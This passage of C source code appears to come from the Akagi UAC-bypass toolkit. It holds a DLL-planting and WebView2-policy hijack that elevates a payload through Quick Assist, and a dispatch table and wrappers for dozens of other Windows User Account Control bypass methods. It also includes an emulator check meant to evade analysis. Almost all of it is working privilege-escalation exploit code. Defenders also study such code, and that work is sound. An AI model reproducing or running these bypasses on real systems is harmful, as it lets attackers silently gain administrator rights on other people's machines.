inputs[7].type = INPUT_KEYBOARD;
inputs[7].ki.wVk = VK_LSHIFT;
inputs[7].ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(8, &inputs[0], sizeof(INPUT));
Sleep(5000);
MethodResult = STATUS_SUCCESS;
} while (FALSE);
if (fEnvSet)
supSetEnvVariable(TRUE, T_VOLATILE_ENV, T_SYSTEMROOT, NULL);
if (fDirCreated) {
DeleteFile(szPayloadDir);
szPayloadDir[PayloadDirNameLen] = 0;
RemoveDirectory(szPayloadDir);
}
return MethodResult;
}
/*
* ucmxModifyWebviewExecutableFolderPolicy
*
* Purpose:
*
* Alter WebView BrowserExecutableFolder parameter.
*
*/
BOOLEAN ucmxModifyWebviewExecutableFolderPolicy(
_In_ LPCWSTR lpPayloadPath
)
{
BOOLEAN bResult = FALSE;
HKEY hKey = NULL;
if (ERROR_SUCCESS == RegCreateKeyEx(HKEY_CURRENT_USER,
T_WEBVIEW_POLICY,
0, NULL,
REG_OPTION_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
&hKey,
NULL))
{
bResult = (RegSetValueEx(hKey,
QUICKASSIST_EXE,
0, REG_SZ,
(const BYTE*)lpPayloadPath,
((DWORD)_strlen(lpPayloadPath) * sizeof(WCHAR)) + sizeof(UNICODE_NULL)) == ERROR_SUCCESS);
RegCloseKey(hKey);
}
return bResult;
}
/*
* ucmxRunQuickAssist
*
* Purpose:
*
* Execute quick assist through direct exe start or protocol.
*
*/
HANDLE ucmxRunQuickAssist()
{
WCHAR szBuffer[MAX_PATH * 2];
SHELLEXECUTEINFO shinfo;
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, QUICKASSIST_EXE);
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpVerb = NULL;
shinfo.lpParameters = NULL;
shinfo.nShow = SW_MINIMIZE;
if (GetFileAttributes(szBuffer) != INVALID_FILE_ATTRIBUTES) {
shinfo.lpFile = szBuffer;
}
else {
shinfo.lpFile = T_QUICKASSIST;
}
if (ShellExecuteEx(&shinfo)) {
return shinfo.hProcess;
}
return NULL;
}
/*
* ucmQuickAssistMethod
*
* Purpose:
*
* Bypass UAC by environment variables hijack and dll planting.
* https://github.com/R41N3RZUF477/QuickAssist_UAC_Bypass
*
*/
NTSTATUS ucmQuickAssistMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOL fDirCreated = FALSE, fEnvSet = FALSE;
HANDLE hProcess;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
WCHAR szPayloadPath[MAX_PATH * 2];
WCHAR szPayloadFile[MAX_PATH * 2];
do {
//
// Select payload entry point.
//
if (!supReplaceDllEntryPoint(
ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_QASSIST,
FALSE))
{
break;
}
//
// Create destination dir "EBWebView\x64" in %temp%.
//
_strcpy(szPayloadPath, g_ctx->szTempDirectory);
_strcat(szPayloadPath, WEBVIEW_DIR);
if (!CreateDirectory(szPayloadPath, NULL)) {
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
_strcat(szPayloadPath, L"\\x64");
if (!CreateDirectory(szPayloadPath, NULL)) {
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
//
// Drop payload and alter it version info block.
//
_strcpy(szPayloadFile, szPayloadPath);
_strcat(szPayloadFile, TEXT("\\"));
_strcat(szPayloadFile, EMBEDDEDBROWSERWEBVIEW_DLL);
if (!supWriteBufferToFile(szPayloadFile, ProxyDll, ProxyDllSize))
break;
fDirCreated = TRUE;
if (!supReplaceVersionInfo(szPayloadFile, (PBYTE)g_webviewvsinfo, sizeof(g_webviewvsinfo), 'qass'))
break;
//
// Relay WebView.
//
if (!ucmxModifyWebviewExecutableFolderPolicy(szPayloadPath)) {
fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, g_ctx->szTempDirectory);
if (fEnvSet == FALSE)
break;
}
//
// Run quick asssist.
//
hProcess = ucmxRunQuickAssist();
if (hProcess == NULL)
break;
if (WaitForSingleObject(hProcess, 15000) != WAIT_OBJECT_0) {
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
break;
}
CloseHandle(hProcess);
MethodResult = STATUS_SUCCESS;
} while (FALSE);
supSetGlobalCompletionEvent();
Sleep(1000);
if (fEnvSet)
supSetEnvVariable(TRUE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, NULL);
if (fDirCreated) {
_strcpy(szPayloadPath, g_ctx->szTempDirectory);
_strcat(szPayloadPath, WEBVIEW_DIR);
supRemoveDirectoryRecursive(szPayloadPath);
}
return MethodResult;
}
================================================
FILE: Source/Akagi/methods/methods.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2025
*
* TITLE: METHODS.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* UAC bypass dispatch.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
UCM_API(MethodTest);
UCM_API(MethodSXS);
UCM_API(MethodDism);
UCM_API(MethodWow64Logger);
UCM_API(MethodUiAccess);
UCM_API(MethodMsSettings);
UCM_API(MethodTyranid);
UCM_API(MethodJunction);
UCM_API(MethodSXSDccw);
UCM_API(MethodHakril);
UCM_API(MethodCorProfiler);
UCM_API(MethodCMLuaUtil);
UCM_API(MethodDccwCOM);
UCM_API(MethodDirectoryMock);
UCM_API(MethodShellSdctl);
UCM_API(MethodTokenModUIAccess);
UCM_API(MethodEditionUpgradeManager);
UCM_API(MethodDebugObject);
UCM_API(MethodShellChangePk);
UCM_API(MethodNICPoison);
UCM_API(MethodDeprecated);
UCM_API(MethodIeAddOnInstall);
UCM_API(MethodWscActionProtocol);
UCM_API(MethodFwCplLua2);
UCM_API(MethodProtocolHijack);
UCM_API(MethodPca);
UCM_API(MethodCurVer);
UCM_API(MethodMsdt);
UCM_API(MethodDotNetSerial);
UCM_API(MethodVFServerTaskSched);
UCM_API(MethodVFServerDiagProf);
UCM_API(MethodIscsiCpl);
UCM_API(MethodAtlHijack);
UCM_API(MethodSspiDatagram);
UCM_API(MethodRequestTrace);
UCM_API(MethodQuickAssist);
ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
UacMethodWow64Logger,
UacMethodEditionUpgradeMgr,
UacMethodNICPoison,
UacMethodIeAddOnInstall,
UacMethodWscActionProtocol,
UacMethodFwCplLua2,
UacMethodMsSettingsProtocol,
UacMethodMsStoreProtocol,
UacMethodPca,
UacMethodCurVer,
UacMethodVFServerTaskSched,
UacMethodVFServerDiagProf,
UacMethodAtlHijack,
UacMethodSspiDatagram,
UacMethodRequestTrace,
UacMethodQuickAssist
};
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodSXS, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodDism, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodWow64Logger, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodUiAccess, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsSettings, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodTyranid, { NT_WIN8_BLUE, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodJunction, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodSXSDccw, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodHakril, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, FALSE, TRUE },
{ MethodCorProfiler, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodCMLuaUtil, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDccwCOM, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, TRUE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDirectoryMock, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodShellSdctl, { NT_WIN10_REDSTONE1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodTokenModUIAccess, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodEditionUpgradeManager, { NT_WIN10_REDSTONE1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodDebugObject, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodShellChangePk, { NT_WIN10_REDSTONE1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodMsSettings, { NT_WIN10_REDSTONE4, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodIeAddOnInstall, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodWscActionProtocol, { NT_WIN7_RTM, NT_WIN11_24H2 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodFwCplLua2, { NT_WIN7_RTM, NT_WIN11_24H2 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodProtocolHijack, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
{ MethodDotNetSerial, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodVFServerTaskSched, { NT_WIN8_BLUE, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodVFServerDiagProf, { NT_WIN7_RTM, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodIscsiCpl, { NT_WIN7_RTM, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
{ MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodRequestTrace, { NT_WIN11_24H2, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodQuickAssist, { NT_WIN10_REDSTONE5, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
};
/*
* IsMethodImplementedForWin32
*
* Purpose:
*
* Check if method implemented in win32 version.
*
*/
__forceinline BOOL IsMethodImplementedForWin32(
_In_ UCM_METHOD Method)
{
UINT i;
for (i = 0; i < RTL_NUMBER_OF(UCM_WIN32_NOT_IMPLEMENTED); i++)
if (UCM_WIN32_NOT_IMPLEMENTED[i] == (ULONG)Method)
return FALSE;
return TRUE;
}
/*
* IsMethodMatchRequirements
*
* Purpose:
*
* Check system requirements of the given method.
*
*/
NTSTATUS IsMethodMatchRequirements(
_In_ PUCM_API_DISPATCH_ENTRY Entry
)
{
#ifdef _DEBUG
UNREFERENCED_PARAMETER(Entry);
#else
//
// Check Wow64 flags first. Disable this check for debugging build.
//
if (g_ctx->IsWow64) {
if (Entry->DisallowWow64) {
return STATUS_NOT_SUPPORTED;
}
}
#ifdef _WIN64
else {
//
// Not required if Win32.
//
if (Entry->Win32OrWow64Required != FALSE) {
return STATUS_NOT_SUPPORTED;
}
}
#endif //_WIN64
//
// Check availability. Disable this check for debugging build.
//
if (g_ctx->dwBuildNumber < Entry->Availability.MinumumWindowsBuildRequired) {
return STATUS_NOT_SUPPORTED;
}
if (g_ctx->dwBuildNumber >= Entry->Availability.MinimumExpectedFixedWindowsBuild) {
return STATUS_NOT_SUPPORTED;
}
#endif
return STATUS_SUCCESS;
}
/*
* PostCleanupAttempt
*
* Purpose:
*
* Attempt to cleanup left overs.
*
*/
VOID PostCleanupAttempt(
_In_ UCM_METHOD Method
)
{
switch (Method) {
case UacMethodDISM:
case UacMethodJunction:
ucmDismMethodCleanup();
break;
case UacMethodWow64Logger:
case UacMethodVFServerDiagProf:
ucmMethodCleanupSingleItemSystem32(WOW64LOG_DLL, NULL);
break;
case UacMethodSXSConsent:
ucmSXSMethodCleanup();
break;
case UacMethodSXSDccw:
ucmSXSDccwMethodCleanup();
break;
case UacMethodHakril:
ucmHakrilMethodCleanup();
break;
case UacMethodIscsiCpl:
ucmIscsiCplMethodCleanup();
break;
case UacMethodAtlHijack:
ucmMethodCleanupSingleItemSystem32(ATL_DLL, WBEM_DIR);
break;
default:
break;
}
ucmConsolePrintValueUlong(TEXT("[+] PostCleanupAttempt for method"), (ULONG)Method, FALSE);
}
/*
* MethodsManagerCall
*
* Purpose:
*
* Run method by method id.
*
*/
NTSTATUS MethodsManagerCall(
_In_ UCM_METHOD Method
)
{
BOOL bParametersBlockSet = FALSE;
NTSTATUS MethodResult, Status;
ULONG PayloadSize = 0, DataSize = 0;
PVOID PayloadCode = NULL, Resource = NULL;
PVOID ImageBaseAddress = g_hInstance;
PUCM_API_DISPATCH_ENTRY Entry;
UCM_PARAMS_BLOCK ParamsBlock;
if (wdIsEmulatorPresent3()) {
return STATUS_NOT_SUPPORTED;
}
if (Method >= UacMethodMax) {
return STATUS_INVALID_PARAMETER;
}
//
// Is method implemented for Win32?
//
#ifndef _WIN64
if (!IsMethodImplementedForWin32(Method)) {
return STATUS_NOT_SUPPORTED;
}
#endif //_WIN64
#pragma warning(push)
#pragma warning(disable:33010) //BS disable.
Entry = &ucmMethodsDispatchTable[Method];
#pragma warning(pop)
Status = IsMethodMatchRequirements(Entry);
if (!NT_SUCCESS(Status))
return Status;
ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Method"), Method, FALSE);
ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Entry->PayloadResourceId"), Entry->PayloadResourceId, TRUE);
if (Entry->PayloadResourceId != PAYLOAD_ID_NONE) {
Status = supLdrQueryResourceDataEx(
Entry->PayloadResourceId,
ImageBaseAddress,
&DataSize,
&Resource);
if (!NT_SUCCESS(Status)) {
if (Status == STATUS_RESOURCE_TYPE_NOT_FOUND)
return STATUS_INVALID_IMAGE_FORMAT;
return Status;
}
if (DataSize == 0 || Resource == NULL) {
return STATUS_INVALID_IMAGE_FORMAT;
}
PayloadCode = g_ctx->DecompressRoutine(Entry->PayloadResourceId, Resource, DataSize, &PayloadSize);
if ((PayloadCode == NULL) || (PayloadSize == 0)) {
return STATUS_DATA_ERROR;
}
}
ParamsBlock.Method = Method;
ParamsBlock.PayloadCode = PayloadCode;
ParamsBlock.PayloadSize = PayloadSize;
ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Entry->SetParameters"), Entry->SetParameters, FALSE);
//
// Set shared parameters.
//
// 1. Execution parameters (flag, session id, winstation\desktop)
// 2. Optional parameter from Akagi command line.
//
if (Entry->SetParameters) {
bParametersBlockSet = supCreateSharedParametersBlock(g_ctx);
ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->bParametersBlockSet"), bParametersBlockSet, FALSE);
}
MethodResult = Entry->Routine(&ParamsBlock);
if (PayloadCode) {
RtlSecureZeroMemory(PayloadCode, PayloadSize);
supVirtualFree(PayloadCode, NULL);
}
//
// Wait a little bit for completion.
//
if (Entry->SetParameters && bParametersBlockSet) {
Status = supWaitForGlobalCompletionEvent();
ucmConsolePrintStatus(TEXT("[+] MethodsManagerCall->supWaitForGlobalCompletionEvent"), Status);
supDestroySharedParametersBlock(g_ctx);
}
//
// Perform method-specific cleanup
//
PostCleanupAttempt(Method);
return MethodResult;
}
/************************************************************
**
**
**
** Method table wrappers
**
**
**
************************************************************/
UCM_API(MethodDeprecated)
{
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
}
UCM_API(MethodTest)
{
#ifdef _DEBUG
return ucmTestRoutine(Parameter->PayloadCode, Parameter->PayloadSize);
#else
UNREFERENCED_PARAMETER(Parameter);
return TRUE;
#endif
}
UCM_API(MethodSXS)
{
return ucmSXSMethod(
Parameter->PayloadCode,
Parameter->PayloadSize,
NULL,
CONSENT_EXE,
MSCONFIG_EXE,
TRUE);
}
UCM_API(MethodDism)
{
return ucmDismMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodWow64Logger)
{
//
// Required x64 as this method abuse wow64 logger mechanism
//
#ifdef _WIN64
return ucmWow64LoggerMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
#else
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#endif
}
UCM_API(MethodUiAccess)
{
return ucmUiAccessMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodMsSettings)
{
LPWSTR lpszPayload = NULL;
LPWSTR lpszTargetApp = NULL;
WCHAR szTargetApp[MAX_PATH * 2];
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
if (Parameter->Method == UacMethodMsSettings2)
lpszTargetApp = COMPUTERDEFAULTS_EXE;
else
lpszTargetApp = FODHELPER_EXE;
_strcpy(szTargetApp, g_ctx->szSystemDirectory);
_strcat(szTargetApp, lpszTargetApp);
return ucmShellRegModMethod(Parameter->Method,
T_MSSETTINGS,
szTargetApp,
lpszPayload);
}
UCM_API(MethodTyranid)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Parameter);
//
// Select target application or use given by optional parameter.
//
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
return ucmDiskCleanupEnvironmentVariable(lpszPayload);
}
UCM_API(MethodJunction)
{
return ucmJunctionMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodSXSDccw)
{
return ucmSXSDccwMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodHakril)
{
return ucmHakrilMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodCorProfiler)
{
return ucmCorProfilerMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodCMLuaUtil)
{
LPWSTR lpszParameter;
UNREFERENCED_PARAMETER(Parameter);
//
// Select target application or use given by optional parameter.
//
if (g_ctx->OptionalParameterLength == 0)
lpszParameter = g_ctx->szDefaultPayload;
else
lpszParameter = g_ctx->szOptionalParameter;
return ucmCMLuaUtilShellExecMethod(lpszParameter);
}
UCM_API(MethodDccwCOM)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Parameter);
//
// Select target application or use given by optional parameter.
//
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
return ucmDccwCOMMethod(lpszPayload);
}
UCM_API(MethodDirectoryMock)
{
return ucmDirectoryMockMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodShellSdctl)
{
LPWSTR Payload = NULL;
if (g_ctx->OptionalParameterLength == 0)
Payload = g_ctx->szDefaultPayload;
else
Payload = g_ctx->szOptionalParameter;
return ucmShellRegModMethod(Parameter->Method,
T_CLASSESFOLDER,
SDCLT_EXE,
Payload);
}
UCM_API(MethodTokenModUIAccess)
{
if (Parameter->Method == UacMethodTokenModUiAccess) {
return ucmTokenModUIAccessMethod(Parameter->PayloadCode,
Parameter->PayloadSize);
}
else {
return ucmTokenModUIAccessMethod2(Parameter->PayloadCode,
Parameter->PayloadSize);
}
}
UCM_API(MethodEditionUpgradeManager)
{
#ifndef _WIN64
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#else
return ucmEditionUpgradeManagerMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
#endif
}
UCM_API(MethodDebugObject)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Parameter);
//
// Select target application or use given by optional parameter.
//
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
return ucmDebugObjectMethod(lpszPayload);
}
UCM_API(MethodShellChangePk)
{
LPWSTR lpszPayload = NULL;
//
// Select target application or use given by optional parameter.
//
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
return ucmShellRegModMethod(Parameter->Method,
T_LAUNCHERSYSTEMSETTINGS,
SLUI_EXE,
lpszPayload);
}
UCM_API(MethodNICPoison)
{
#ifndef _WIN64
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#else
if (Parameter->Method == UacMethodNICPoison) {
return ucmNICPoisonMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
else if (Parameter->Method == UacMethodNICPoison2) {
return ucmNICPoisonMethod2(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
else
return STATUS_NOT_SUPPORTED;
#endif
}
UCM_API(MethodIeAddOnInstall)
{
#ifdef _WIN64
return ucmIeAddOnInstallMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
#else
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#endif
}
UCM_API(MethodWscActionProtocol)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Parameter);
//
// Select target application or use given by optional parameter.
//
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
return ucmWscActionProtocolMethod(lpszPayload);
}
UCM_API(MethodFwCplLua2)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Parameter);
//
// Select target application or use given by optional parameter.
//
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
return ucmFwCplLuaMethod2(lpszPayload);
}
UCM_API(MethodProtocolHijack)
{
NTSTATUS Result = STATUS_ACCESS_DENIED;
LPWSTR PayloadParameter = NULL, PayloadFinal = NULL;
SIZE_T Size;
//
// Select target application or use given by optional parameter.
//
if (g_ctx->OptionalParameterLength == 0)
PayloadParameter = g_ctx->szDefaultPayload;
else
PayloadParameter = g_ctx->szOptionalParameter;
switch (Parameter->Method) {
case UacMethodMsSettingsProtocol:
Result = ucmMsSettingsProtocolMethod(PayloadParameter);
break;
case UacMethodMsStoreProtocol:
Size = ((MAX_PATH * 2) + _strlen(PayloadParameter)) * sizeof(WCHAR);
